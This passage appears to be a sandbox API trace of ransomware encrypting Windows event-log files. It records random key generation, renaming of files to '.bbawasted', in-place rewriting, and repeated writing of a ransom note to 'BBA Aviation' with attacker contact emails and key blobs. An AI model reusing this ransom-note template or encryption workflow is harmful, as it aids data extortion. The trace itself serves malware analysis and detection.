KEY:\r\n[begin_key]CFwht6E0Y48jal+lga/LhZE2WpqItZbHoc9FtzgP+3O2BuwUnheTwbHRdERynzDi\r\nLGMx6U3rP9EV69Rh9oPXbWWty19dRqWZRFGDwrrQtKgofBZw31uPCpveADnOBuM6\r\nELSIzP9cV3BY+/8tOgmhALBKoGdLa84H4kbNQc2RY6g5OJwhD+q+TXHrz0J/yesW\r\nKlCZGyYzfaXozUbRomJW9FWjXqrXppuFeJ81Cu/qm4/fy5soG1xP791Jtmu2j3Lb\r\nsYW95UaYiUNS0O08eI3L3O8o4BM2IEroQzFu6nsywCvnaf1qNtpCKNAN9uItmi/7\r\njrGEnMbQ55jwqUNEY3TL/DziwOUSEOhxDEtXsuOyzPnE5yWio1E4nVSMQltjWIhB\r\ncnD1k5b5O7xUPtkgXsJfTqIat88+Hpm6Z5yHt5xOxthyl8UoTVTm9p9ozKVuWmVo\r\nK4ue4P/WzLIO/thVSxQXTdP3ah30HN2Vfu2fh5jKqhXbpqobLnotkdK3hKvGp7AU\r\nR8Qwo8YED4/r3DHM/XVS6zGqfabkir3hzlOdjlOVMsGKQr5k4k/GPIfps6gGUDGY\r\nkKe1ydwJvrjywq7/yY6zxEAw/042HR3MtpkBqGv3AX1Fb4UOufe/re/AKobbJ/fZ\r\n7jJcewOkC5/lmnb7ph6ghg7T21F/pqzO97B0IvGkJjy=[end_key]\r\nKEEP IT\r\n") returned 984 [0185.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0185.815] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0185.816] SetEndOfFile (hFile=0x28c) returned 1 [0185.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.818] CloseHandle (hObject=0x28c) returned 1 [0185.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0185.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0185.986] _aulldvrm () returned 0x0 [0185.986] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0185.987] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0185.987] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0185.987] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 61 [0185.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0185.988] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0185.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.988] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0185.988] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0185.988] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0185.989] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0185.989] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0185.990] SetEndOfFile (hFile=0x28c) returned 1 [0185.991] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.991] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0185.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.bbawasted")) returned 1 [0185.992] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0185.992] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0185.992] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0185.992] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0185.993] CloseHandle (hObject=0x294) returned 1 [0186.237] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0186.238] CloseHandle (hObject=0x280) returned 1 [0186.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0186.238] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0186.239] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0186.239] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0186.239] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0186.240] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0186.240] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0186.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0186.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0186.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0186.252] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZTvhKcO1+HxA1bhUjtoPT2c+p8892Kra0ga8TVN4ZZuoGNz46w4OejLa5lpO6JV/\r\nBb0Y1TjhCjbPRT1frPBnhmprxCyiRsLHrouEwZDMTQlJirRpszAEqwxsEqDaURG2\r\nSbXyrXVCXUpN/ZkliUC0R+vGh6H+as6Pam/bM/xPze3b1aAZxgtH9xxlfrUH7PrJ\r\nmtamEA8aeP4pTP06+z+VkC6s9+hbKDaFCrYL85pjgJ+AiP6K0dyLR4mkmnaJrOp5\r\nEpFKtTVMAynqaPNGCcG4eCvbqMGkI8VZwQ+7OwWB35CG2kw1ibZyfEDbCqOX8kao\r\noMPkcExPM2W3dT8GaX+wp2a6jrtUlO4ChX9u5yOZiAfxJuqV/xtZCxq+Mp+JWDKf\r\nPZxARDMAeiFtzuKV6+gPuHCBm3BM5/Q03dLOHKt29lZPEUL1rxoFtXXCMAaYo2pv\r\npUxo/tyMkG9VZl29mIzYvQLw+synePQ2K1AfUdGq9IF3YwwRlj9VHC7gpWn210sx\r\ncGktj6EnUMS30JyJ0lzAmNcSQ5fhR8QOuwrtTlZ/AZrjqmOFA4Jhr2pXk93sc8ly\r\nvbwf5FgQrbL/jwTNHiGjdN+WfPiVX06VWK+ExUNg7gVAyXGO45igbbF4enYuAxS5\r\n5rWf/KTQpCWwcjQGhiwgP4JvyeCGk/uw6vByK2R4FGJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0186.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0186.253] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0186.253] SetEndOfFile (hFile=0x28c) returned 1 [0186.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0186.256] CloseHandle (hObject=0x28c) returned 1 [0186.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0186.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7e28 | out: hHeap=0x660000) returned 1 [0186.261] _aulldvrm () returned 0x0 [0186.262] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0186.263] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0186.263] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0186.263] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 60 [0186.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0186.263] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0186.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0186.263] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0186.264] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0186.264] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0186.264] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0186.266] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0186.267] SetEndOfFile (hFile=0x28c) returned 1 [0186.268] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0186.268] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0186.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.bbawasted")) returned 1 [0186.366] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0186.366] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0186.366] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0186.367] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0186.367] CloseHandle (hObject=0x280) returned 1 [0186.415] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0186.417] CloseHandle (hObject=0x294) returned 1 [0186.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0186.532] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0186.533] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0186.533] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0186.534] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0186.534] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0186.534] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0186.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0186.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0186.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0186.546] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i+RWzKQ58NpV1+GNH6t581nILOgA7RVrYH1v4tBq9xlSatwIZfWnK0BZcCcW/QOd\r\noBl9pv1zvQkFNuUCcmWDuAWxy20B8gdlxrouJwvcJ/OK6oXnzEPvN/W37/Dy8QIG\r\nSySqeui1I3MdwDzzY9j9xnGLtIU6GnA/vp11I9yBDZM/iunmNjaOoSIsK2uzpOUH\r\nGapvrkQ8g2SwZg0+/bvr6VL03IWotSOUt2yy+JnY7C9rf9ZuOo5gNWoP6r/WfWhj\r\nuvF/2R2ayHH9DZ2gy05zJK7DedP03nBnEJBQz4TihqrXxBIdC0HMG0D5qXlkguTx\r\n0fcb0GWEmDev0kfatuQ0wIv/2LMUTODbI0J+ZVMRlK+Q0xdXzuCMuv/d/q/Nkcrd\r\nUCi0IvDbrR1rpjv/6QtZakeNy74yBsjtSVqzm6QTHKDKVSusESwsR5Cq5SMl6prD\r\ncm1cjt2EEBT/TyfNV7K/CLxKselv2zHWWEVKdwmgxAO34uIu9+J6KMr81FMGuTYs\r\ntC2ZowvLk0WH1Q/8OEeVhSVnok5+ANViqG40IBnPSTYIwJa2XGlCUM+qXkLYh26x\r\nOJkfipRvVcND9plvUZDrEEUJkIQzKkHVVSQDiSPgyfSXkox8+FyYHrrS48FgmDv6\r\np10vP0+3zAAoy8ge2pzETAtUlCrbSMU3jZ9YaVZxxKV=[end_key]\r\nKEEP IT\r\n") returned 984 [0186.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0186.546] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0186.547] SetEndOfFile (hFile=0x28c) returned 1 [0186.550] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0186.550] CloseHandle (hObject=0x28c) returned 1 [0186.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0186.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8848 | out: hHeap=0x660000) returned 1 [0186.562] _aulldvrm () returned 0x0 [0186.562] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0186.563] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0186.563] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0186.563] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 90 [0186.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2be) returned 0x6aecf0 [0186.564] lstrcpyW (in: lpString1=0x6aeda4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0186.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0186.564] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0186.564] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0186.564] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0186.565] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0186.566] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0186.568] SetEndOfFile (hFile=0x28c) returned 1 [0186.568] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0186.568] lstrcpyW (in: lpString1=0x6aeda4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0186.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.bbawasted")) returned 1 [0186.612] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0186.612] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0186.612] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0186.612] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x5480000 [0186.613] CloseHandle (hObject=0x294) returned 1 [0187.192] UnmapViewOfFile (lpBaseAddress=0x5480000) returned 1 [0187.206] CloseHandle (hObject=0x280) returned 1 [0187.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0187.207] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0187.207] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0187.207] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0187.208] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0187.208] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0187.208] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0187.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0187.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0187.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0187.245] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lvkOlRqupiQ7VGL5jpCnB34fWrrEKlhI1rDR851gBGR9dzBkI39H5eWcCe3ZvyvV\r\n8V6+Kl/OD7QuGQfr0TJ9uKre2J8VTnhD42LvBb/OMirr/1TG03QOEdcM3SxIMSTY\r\nZAME4CBZDK5RbnLpdQ0+qo/xWQOWfwLv5dRi4xP38eEkvCGPhv2PVyspHyWFSKSy\r\n9J9R998a6AZEP0lbbft7dKHX7RLFj6CjgHPFDHzfvSpD2Y3DEqaI4x+0f2J47eSK\r\nIJW0LzanphXvgJNVgnSqzRwoVPyty0rSw3Jel8xWjP2JVXkdQQL7DXnMDAex+imo\r\ne9c6I5jUVImHibRd/sLoxjeH+sd2Qh0TuP2uv52dLh8YejxjPpE3BOO1hwFxNeCE\r\nB/pTxdBwwmxIkuobfpjow3NaM+gd9cqQjHclMtUuXAih+EerU5WO+sitQ1yhu8Mx\r\ns7urcoxp2QkjHEiUnAjVkFGHF1yRUtj7eg6oO2koU41U2t9l4FzPfhRSc9FBb+n9\r\n9yDbOEt1dD+oUAoL0pq6UIhtI5/OG2FkiKIc4wwxQmWSrv2rVLY9FAjBAVqv4aEs\r\nEsOsKDCtgf8QvlOFFhVxxTJwtucsn3FeTE9ZpW0ZOfdhPNCpXaDPIdbWnDWvv7dd\r\nONgW/DQlq0dXHNzRL7z75zUyplbEwYk02hT3RNnaVOj=[end_key]\r\nKEEP IT\r\n") returned 984 [0187.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0187.305] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0187.305] SetEndOfFile (hFile=0x28c) returned 1 [0187.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0187.308] CloseHandle (hObject=0x28c) returned 1 [0187.576] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0187.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9098 | out: hHeap=0x660000) returned 1 [0187.577] _aulldvrm () returned 0x0 [0187.577] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0187.578] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0187.578] CryptReleaseContext 